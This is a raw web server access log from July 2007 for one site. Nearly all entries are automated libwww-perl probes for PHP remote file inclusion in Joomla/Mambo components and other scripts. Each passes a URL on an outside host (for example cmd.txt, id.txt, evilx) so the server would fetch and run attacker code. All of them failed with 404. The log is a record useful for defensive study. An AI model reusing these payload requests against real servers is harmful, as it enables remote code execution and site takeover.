217.172.178.222 - - [22/Jul/2007:18:06:05 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.85.105.25 - - [22/Jul/2007:18:06:18 -0700] "GET /logs//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
209.85.105.25 - - [22/Jul/2007:18:06:18 -0700] "GET //components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
66.230.204.130 - - [22/Jul/2007:18:06:19 -0700] "GET /logs//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [22/Jul/2007:18:06:19 -0700] "GET //components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
209.85.105.25 - - [22/Jul/2007:18:06:20 -0700] "GET /logs//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.105.25 - - [22/Jul/2007:18:06:21 -0700] "GET //components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
83.16.15.42 - - [22/Jul/2007:18:06:31 -0700] "GET /logs/index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.16.15.42 - - [22/Jul/2007:18:06:37 -0700] "GET /index.php?inc=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.227.103.25 - - [22/Jul/2007:18:07:26 -0700] "GET /logs/access.log//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.103.25 - - [22/Jul/2007:18:07:27 -0700] "GET //components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.103.25 - - [22/Jul/2007:18:07:27 -0700] "GET /logs//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.204.130 - - [22/Jul/2007:18:07:33 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.204.130 - - [22/Jul/2007:18:07:33 -0700] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
66.230.218.91 - - [22/Jul/2007:18:07:35 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
66.230.218.91 - - [22/Jul/2007:18:07:35 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
62.149.227.167 - - [22/Jul/2007:18:07:52 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.openonline.org/chat/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.123.226.70 - - [22/Jul/2007:18:08:30 -0700] "GET /logs/access.log//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.123.226.70 - - [22/Jul/2007:18:08:31 -0700] "GET //components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
216.123.226.70 - - [22/Jul/2007:18:08:31 -0700] "GET /logs//components/com_articles.php?absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:09:06 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:11:46 -0700] "GET /logs/index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:11:49 -0700] "GET /index.php?file=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
198.65.60.246 - - [22/Jul/2007:18:12:53 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.j-vision.co.kr/tmp/rhe.ganteng?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.galf.org"
198.65.60.246 - - [22/Jul/2007:18:12:53 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.j-vision.co.kr/tmp/rhe.ganteng?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50"
85.214.39.108 - - [22/Jul/2007:18:13:11 -0700] "GET /logs/index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.39.108 - - [22/Jul/2007:18:13:12 -0700] "GET /index.php?include=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.28.199 - - [22/Jul/2007:18:13:28 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.71.106.20 - - [22/Jul/2007:18:14:46 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://m.domaindlx.com/jebol/x.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:16:11 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:16:11 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:16:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.40.99.241 - - [22/Jul/2007:18:16:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:16:48 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
218.38.28.199 - - [22/Jul/2007:18:16:50 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:16:51 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.249.73.202 - - [22/Jul/2007:18:17:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
66.249.73.202 - - [22/Jul/2007:18:17:15 -0700] "GET /logs/access_070319.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "galf.org"
85.10.128.248 - - [22/Jul/2007:18:18:04 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:18:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.218.91 - - [22/Jul/2007:18:18:34 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.allexxx.xpg.com.br/rootlab.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.17.159 - - [22/Jul/2007:18:19:51 -0700] "GET /labia/ HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:20:31 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:20:31 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:20:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:20:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:21:07 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:18:21:08 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:18:21:20 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:18:21:20 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:21:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:21:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
64.40.99.241 - - [22/Jul/2007:18:22:22 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:22:22 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:22:52 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:22:52 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:18:22:58 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.252.124 - - [22/Jul/2007:18:22:59 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:18:23:00 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:18:23:00 -0700] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
74.6.17.114 - - [22/Jul/2007:18:23:14 -0700] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:18:24:07 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:18:24:08 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.133.27 - - [22/Jul/2007:18:24:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:26:08 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:28:15 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:28:15 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:18:30:32 -0700] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
204.11.33.11 - - [22/Jul/2007:18:30:32 -0700] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:31:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
70.84.7.74 - - [22/Jul/2007:18:31:46 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:32:01 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:32:01 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
201.72.166.36 - - [22/Jul/2007:18:33:39 -0700] "GET /index.php?go=http://spiderman3.xlphp.net/x? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:35:20 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:18:35:21 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:35:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:35:22 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.214.39.108 - - [22/Jul/2007:18:36:07 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.39.108 - - [22/Jul/2007:18:36:08 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:36:25 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
61.222.36.82 - - [22/Jul/2007:18:36:26 -0700] "GET /modules/My_eGallery/index.php?basepath=http://az.co.cz/foto/r6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:37:13 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:37:14 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:37:15 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:18:37:15 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:38:17 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:38:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
150.185.222.15 - - [22/Jul/2007:18:38:55 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:39:15 -0700] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:39:15 -0700] "GET //myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:41:18 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:41:18 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:41:28 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:18:41:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:41:36 -0700] "GET /logs/index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:41:38 -0700] "GET /index2.php?x=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:41:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:41:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.10.128.248 - - [22/Jul/2007:18:42:08 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.10.128.248 - - [22/Jul/2007:18:42:09 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:42:27 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:42:27 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.161.181 - - [22/Jul/2007:18:42:47 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
83.16.15.42 - - [22/Jul/2007:18:43:11 -0700] "GET /logs/access.log/myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.36.230.63 - - [22/Jul/2007:18:43:21 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
66.36.230.63 - - [22/Jul/2007:18:43:21 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.16.15.42 - - [22/Jul/2007:18:44:36 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:45:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:45:27 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:46:15 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
85.158.202.29 - - [22/Jul/2007:18:46:18 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806"
85.158.202.29 - - [22/Jul/2007:18:46:55 -0700] "GET /logs/access.log//myfunctions/mygallerybrowser.php?myPath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:48:07 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.40.99.241 - - [22/Jul/2007:18:48:07 -0700] "GET /modules/My_eGallery/index.php?basepath=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:48:39 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.10.128.248 - - [22/Jul/2007:18:48:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://x-tal.ajou.ac.kr/zeroboard//skin/zero_vote/evilx? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
